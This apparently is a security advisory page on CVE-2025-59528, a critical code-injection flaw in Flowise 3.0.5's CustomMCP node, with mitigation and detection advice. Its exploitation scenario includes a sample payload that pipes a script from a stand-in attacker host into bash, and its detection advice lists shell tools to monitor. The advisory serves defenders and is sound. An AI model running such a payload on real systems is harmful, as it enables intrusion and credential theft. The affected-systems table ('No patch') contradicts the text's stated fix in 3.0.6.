CVE-2025-59528 — CRITICAL (CVSS 10.0) AI Security Vulnerability

CISO Take

Flowise 3.0.5 contains a maximum-severity (CVSS 10.0) unauthenticated remote code execution flaw: the CustomMCP node passes user-supplied configuration strings directly into JavaScript's `Function()` constructor with zero sanitization, granting attackers full Node.js runtime access including `child_process` and `fs` modules. With no privileges required, no user interaction needed, and a public proof-of-concept already available, any internet-exposed Flowise instance should be treated as actively compromised until patched. Flowise has 16 prior CVEs in the same package, and this class of vulnerability — server-side JavaScript injection in LLM orchestration tooling — is a particularly high-value target because these platforms typically run with broad filesystem and network access in AI production environments. Upgrade immediately to Flowise 3.0.6; if patching is blocked, restrict access to the CustomMCP node configuration endpoint via network controls and audit process execution logs for anomalous child_process spawning.

Sources: NVD GitHub Advisory ATLAS

Risk Assessment

Maximum exploitability: CVSS 10.0 with network vector, low complexity, no privileges, no user interaction, and changed scope. The Function() constructor pattern is a well-understood exploit primitive — no specialized knowledge required to weaponize. Public PoC lowers the bar to script-kiddie level. Not yet in CISA KEV but given the trivial exploitation and critical severity, KEV addition is plausible. AI orchestration platforms like Flowise typically run in privileged positions within the data pipeline — with access to LLM API keys, database credentials, and internal services — dramatically amplifying post-exploitation blast radius beyond the vulnerable host itself.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
flowise	npm	—	No patch
flowise	npm	—	No patch

Severity & Risk

CVSS 3.1

10.0 / 10

EPSS

N/A

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

**Immediate**: Upgrade Flowise to version 3.0.6 which patches the Function() constructor injection. 2. **If unable to patch**: Block external access to the Flowise API endpoint (default port 3000) at the network/WAF layer; restrict CustomMCP node usage via Flowise's built-in authorization controls if configured. 3. **Detection**: Monitor for anomalous child process spawning from the Flowise Node.js process (e.g., `sh`, `bash`, `curl`, `wget`, `nc` as child processes). Review Node.js application logs for unusual `Function()` constructor invocations. Search SIEM for outbound connections from the Flowise host to non-standard endpoints. 4. **Post-patch**: Rotate all credentials (LLM API keys, DB passwords, cloud tokens) accessible from the Flowise server environment — assume compromise if the server was internet-exposed on 3.0.5.

Classification

Code Execution Supply Chain Agent Framework Plugin AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation AML.T0072 - Reverse Shell AML.T0083 - Credentials from AI Agent Configuration

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, Robustness and Cybersecurity

ISO 42001

A.6.2.5 - AI System Security

NIST AI RMF

MANAGE 2.2 - Mechanisms for AI Risk Response

OWASP LLM Top 10

LLM07 - Insecure Plugin Design

Technical Details

NVD Description

Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, Flowise is vulnerable to remote code execution. The CustomMCP node allows users to input configuration settings for connecting to an external MCP server. This node parses the user-provided mcpServerConfig string to build the MCP server configuration. However, during this process, it executes JavaScript code without any security validation. Specifically, inside the convertToValidJSONString function, user input is directly passed to the Function() constructor, which evaluates and executes the input as JavaScript code. Since this runs with full Node.js runtime privileges, it can access dangerous modules such as child_process and fs. This issue has been patched in version 3.0.6.

Exploitation Scenario

An attacker identifies an internet-exposed Flowise instance via Shodan/Censys (Flowise has a recognizable web UI fingerprint). They send a crafted POST request to the node configuration API endpoint (no authentication required in default deployments), embedding a JavaScript payload in the `mcpServerConfig` field — e.g., `require('child_process').exec('curl attacker.com/shell.sh | bash')`. The `convertToValidJSONString` function passes this directly to `new Function(userInput)()`, executing it with the Node.js process's full privileges. The attacker establishes a reverse shell, then systematically harvests all environment variables (LLM API keys, database URLs), reads the Flowise flows database to enumerate connected AI services, and uses the compromised server as a pivot point into the organization's internal AI infrastructure.